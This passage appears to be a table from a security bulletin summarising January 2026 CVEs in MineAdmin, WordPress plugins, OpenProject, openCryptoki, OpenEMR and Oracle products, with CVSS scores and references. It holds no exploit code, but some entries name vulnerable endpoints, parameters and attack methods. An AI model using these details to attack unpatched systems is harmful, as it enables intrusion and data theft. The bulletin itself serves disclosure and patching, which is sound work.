| MineAdmin--MineAdmin | A vulnerability was identified in MineAdmin 1.x/2.x. The impacted element is an unknown function of the file /system/cache/view of the component View Interface. The manipulation leads to improper authorization. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 6.3 | CVE-2026-1193 | VDB-341778 (MineAdmin View view improper authorization); CTI Indicators (IOB, IOC, TTP, IOA); Submit #734270 (MineAdmin Enterprise Backend Management System v1.x/v2.x, logical flaw and vulnerability); https://github.com/SourByte05/MineAdmin-Vulnerability/issues/6 |
| MineAdmin--MineAdmin | A security flaw has been discovered in MineAdmin 1.x/2.x. This affects an unknown function of the component Swagger. The manipulation results in information disclosure. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 5.3 | CVE-2026-1194 | VDB-341779 (MineAdmin Swagger information disclosure); CTI Indicators (IOB, IOC, TTP); Submit #734271 (MineAdmin Enterprise Backend Management System v1.x/v2.x, Swagger information leakage vulnerability); https://github.com/SourByte05/MineAdmin-Vulnerability/issues/5 |
| MineAdmin--MineAdmin | A weakness has been identified in MineAdmin 1.x/2.x. This impacts the function refresh of the file /system/refresh of the component JWT Token Handler. This manipulation causes insufficient verification of data authenticity. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is said to be difficult. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 5 | CVE-2026-1195 | VDB-341780 (MineAdmin JWT Token refresh data authenticity); CTI Indicators (IOB, IOC, IOA); Submit #734272 (MineAdmin Enterprise Backend Management System v1.x/v2.x, flaw vulnerability); https://github.com/SourByte05/MineAdmin-Vulnerability/issues/4 |
| neop--Postalicious | The Postalicious plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-24 | 4.4 | CVE-2026-1266 | https://www.wordfence.com/threat-intel/vulnerabilities/id/512c9a2f-b023-4e28-8dd8-35795e68a8b3?source=cve https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L316 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L316 https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L533 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L533 https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L541 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L541 https://plugins.trac.wordpress.org/browser/postalicious/trunk/wp-postalicious.php#L548 https://plugins.trac.wordpress.org/browser/postalicious/tags/3.0.1/wp-postalicious.php#L548 |
| nhomcaodem--Viet contact | The Viet contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-20 | 4.4 | CVE-2026-1045 | https://www.wordfence.com/threat-intel/vulnerabilities/id/131a6a35-e0d2-4613-8614-24bf11011098?source=cve https://plugins.trac.wordpress.org/browser/viet-contact/trunk/inc/vietcontact-admin.php#L34 https://plugins.trac.wordpress.org/browser/viet-contact/trunk/inc/vietcontact-content.php#L11 |
| norcross--WP Hello Bar | The WP Hello Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'digit_one' and 'digit_two' parameters in all versions up to, and including, 1.02 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-20 | 4.4 | CVE-2026-1042 | https://www.wordfence.com/threat-intel/vulnerabilities/id/73b55486-adb8-40c6-9113-c98618d9cb00?source=cve https://downloads.wordpress.org/plugin/wp-hello-bar.1.02.zip https://wordpress.org/plugins/wp-hello-bar/ https://plugins.trac.wordpress.org/browser/wp-hello-bar/tags/1.02/wp-hello-bar.php#L214 https://plugins.trac.wordpress.org/browser/wp-hello-bar/tags/1.02/wp-hello-bar.php#L222 https://plugins.trac.wordpress.org/browser/wp-hello-bar/tags/1.02/wp-hello-bar.php#L152 |
| NVIDIA--CUDA Toolkit | NVIDIA Nsight Systems for Windows contains a vulnerability in the application's DLL loading mechanism where an attacker could cause an uncontrolled search path element by exploiting insecure DLL search paths. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service and information disclosure. | 2026-01-20 | 6.7 | CVE-2025-33231 | https://nvd.nist.gov/vuln/detail/CVE-2025-33231 https://www.cve.org/CVERecord?id=CVE-2025-33231 https://nvidia.custhelp.com/app/answers/detail/a_id/5755 |
| opencryptoki--opencryptoki | openCryptoki is a PKCS#11 library and provides tooling for Linux and AIX. Versions 2.3.2 and above are vulnerable to symlink-following when running in privileged contexts. A token-group user can redirect file operations to arbitrary filesystem targets by planting symlinks in group-writable token directories, resulting in privilege escalation or data exposure. Token and lock directories are 0770 (group-writable for token users), so any token-group member can plant files and symlinks inside them. When run as root, the base code handling token directory file access, as well as several openCryptoki tools used for administrative purposes, may reset ownership or permissions on existing files inside the token directories. An attacker with token-group membership can exploit the system when an administrator runs a PKCS#11 application or administrative tool that performs chown on files inside the token directory during normal maintenance. This issue is fixed in commit 5e6e4b4, but has not been included in a released version at the time of publication. | 2026-01-22 | 6.8 | CVE-2026-23893 | https://github.com/opencryptoki/opencryptoki/security/advisories/GHSA-j6c7-mvpx-jx5q https://github.com/opencryptoki/opencryptoki/commit/5e6e4b42f2b1fcc1e4ef1b920e463bfa55da8b45 |
| OpenEMR Foundation, Inc.--OpenEMR | OpenEMR 5.0.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript through user profile parameters. Attackers can exploit the vulnerability by crafting a malicious payload to download and execute a web shell, enabling remote command execution on the vulnerable OpenEMR instance. | 2026-01-21 | 5.4 | CVE-2021-47817 | ExploitDB-49784 OpenEMR Official Website OpenEMR 5.0.2.1 Download SonarSource Vulnerability Analysis Vulnerability Demonstration Video VulnCheck Advisory: OpenEMR 5.0.2.1 - Remote Code Execution |
| opf--openproject | OpenProject is an open-source, web-based project management software. Users of OpenProject versions prior to 16.6.5 and 17.0.1 have the ability to view and end their active sessions via Account Settings → Sessions. When deleting a session, it was not properly checked whether the session belongs to the user. As the IDs used to identify these session objects are incremental integers, users could iterate requests using `DELETE /my/sessions/:id` and thus unauthenticate other users. Users did not have access to any sensitive information (like browser identifier, IP addresses, etc.) of other users that is stored in the session. The problem was patched in OpenProject versions 16.6.5 and 17.0.1. No known workarounds are available, as the action does not require any permission or other setting that could be temporarily disabled. | 2026-01-19 | 6.5 | CVE-2026-23646 | https://github.com/opf/openproject/security/advisories/GHSA-w422-xf8f-v4vp https://github.com/opf/openproject/releases/tag/v16.6.5 https://github.com/opf/openproject/releases/tag/v17.0.1 |
| opf--openproject | OpenProject is an open-source, web-based project management software. When using groups in OpenProject to manage users, the group members should only be visible to users that have the View Members permission in any project that the group is also a member of. Prior to versions 17.0.1 and 16.6.5, due to a failed permission check, if a user had the View Members permission in any project, they could enumerate all Groups and view which other users are part of the group. The issue has been fixed in OpenProject 17.0.1 and 16.6.5. No known workarounds are available. | 2026-01-19 | 4.3 | CVE-2026-23721 | https://github.com/opf/openproject/security/advisories/GHSA-vj77-wrc2-5h5h |
| Oracle Corporation--JD Edwards EnterpriseOne Tools | Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.0.0-9.2.26.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21946 | Oracle Advisory |
| Oracle Corporation--MySQL Cluster | Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21936 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 6.5 | CVE-2026-21949 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 6.5 | CVE-2026-21950 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 6.5 | CVE-2026-21968 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 5.3 | CVE-2026-21929 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21937 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21941 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21948 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21952 | Oracle Advisory |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Thread Pooling). Supported versions that are affected are 8.0.0-8.0.44, 8.4.0-8.4.7 and 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.9 | CVE-2026-21964 | Oracle Advisory |
| Oracle Corporation--Oracle Agile Product Lifecycle Management for Process | Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Product Quality Management). The supported version that is affected is 6.2.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile Product Lifecycle Management for Process accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 6.5 | CVE-2026-21944 | Oracle Advisory |
| Oracle Corporation--Oracle APEX Sample Applications | Vulnerability in the Oracle APEX Sample Applications product of Oracle APEX (component: Brookstrut Sample App). Supported versions that are affected are 23.2.0, 23.2.1, 24.1.0, 24.2.0 and 24.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle APEX Sample Applications. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle APEX Sample Applications, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle APEX Sample Applications accessible data as well as unauthorized read access to a subset of Oracle APEX Sample Applications accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 5.4 | CVE-2026-21931 | Oracle Advisory |
| Oracle Corporation--Oracle Applications DBA | Vulnerability in the Oracle Applications DBA product of Oracle E-Business Suite (component: Java utils). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Applications DBA. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Applications DBA accessible data as well as unauthorized access to critical data or complete access to all Oracle Applications DBA accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). | 2026-01-20 | 6.5 | CVE-2026-21960 | Oracle Advisory |
| Oracle Corporation--Oracle Configurator | Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Configurator accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-01-20 | 5.3 | CVE-2026-21972 | Oracle Advisory |
| Oracle Corporation--Oracle Database Server | Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19.3-19.29 and 21.3-21.20. Easily exploitable vulnerability allows high privileged attacker having Authenticated User privilege with network access via Oracle Net to compromise Java VM. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Java VM. CVSS 3.1 Base Score 4.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H). | 2026-01-20 | 4.5 | CVE-2026-21975 | Oracle Advisory |
| Oracle Corporation--Oracle FLEXCUBE Universal Banking | Vulnerability in the Oracle FLEXCUBE Universal Banking product of Oracle Financial Services Applications (component: Relationship Pricing). Supported versions that are affected are 14.0.0.0.0-14.8.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle FLEXCUBE Universal Banking. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Universal Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 6.5 | CVE-2026-21978 | Oracle Advisory |
| Oracle Corporation--Oracle Hospitality OPERA 5 Property Services | Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Opera). Supported versions that are affected are 5.6.19.23, 5.6.25.17, 5.6.26.10 and 5.6.27.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hospitality OPERA 5 Property Services, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality OPERA 5 Property Services accessible data as well as unauthorized read access to a subset of Oracle Hospitality OPERA 5 Property Services accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21966 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Networking). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21933 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: RMI). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 4.8 | CVE-2026-21925 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Coding | Vulnerability in the Oracle Life Sciences Central Coding product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Coding. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Life Sciences Central Coding accessible data as well as unauthorized read access to a subset of Oracle Life Sciences Central Coding accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 6.5 | CVE-2026-21980 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Designer | Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Life Sciences Central Designer accessible data as well as unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). | 2026-01-20 | 6.5 | CVE-2026-21923 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Designer | Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). | 2026-01-20 | 6.5 | CVE-2026-21970 | Oracle Advisory |
| Oracle Corporation--Oracle Life Sciences Central Designer | Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-01-20 | 5.3 | CVE-2026-21974 | Oracle Advisory |
| Oracle Corporation--Oracle Planning and Budgeting Cloud Service | Vulnerability in the Oracle Planning and Budgeting Cloud Service product of Oracle Hyperion (component: EPM Agent). The supported version that is affected is 25.04.07. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Planning and Budgeting Cloud Service executes to compromise Oracle Planning and Budgeting Cloud Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Planning and Budgeting Cloud Service accessible data. Note: Update EPM Agent. Please refer to "Downloading the EPM Agent" (https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html) for more information. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N). | 2026-01-20 | 4.2 | CVE-2026-21922 | Oracle Advisory |
| Oracle Corporation--Oracle Planning and Budgeting Cloud Service | Vulnerability in the Oracle Planning and Budgeting Cloud Service product of Oracle Hyperion (component: EPM Agent). The supported version that is affected is 25.04.07. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Planning and Budgeting Cloud Service executes to compromise Oracle Planning and Budgeting Cloud Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Planning and Budgeting Cloud Service accessible data. Note: Update EPM Agent. Please refer to "Downloading the EPM Agent" (https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html) for more information. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N). | 2026-01-20 | 4.2 | CVE-2026-21979 | Oracle Advisory |
| Oracle Corporation--Oracle Scripting | Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Scripting Admin). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Scripting. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Scripting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Scripting accessible data as well as unauthorized read access to a subset of Oracle Scripting accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). | 2026-01-20 | 6.1 | CVE-2026-21943 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Driver). The supported version that is affected is 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Solaris accessible data as well as unauthorized access to critical data or complete access to all Oracle Solaris accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N). | 2026-01-20 | 5.8 | CVE-2026-21927 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). | 2026-01-20 | 5.3 | CVE-2026-21928 | Oracle Advisory |
| Oracle Corporation--Oracle Solaris | Vulnerability in the Oracle Solaris product of Oracle Systems (component: Driver). The supported version that is affected is 11. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Solaris accessible data as well as unauthorized access to critical data or complete access to all Oracle Solaris accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N). | 2026-01-20 | 5.8 | CVE-2026-21935 | Oracle Advisory |
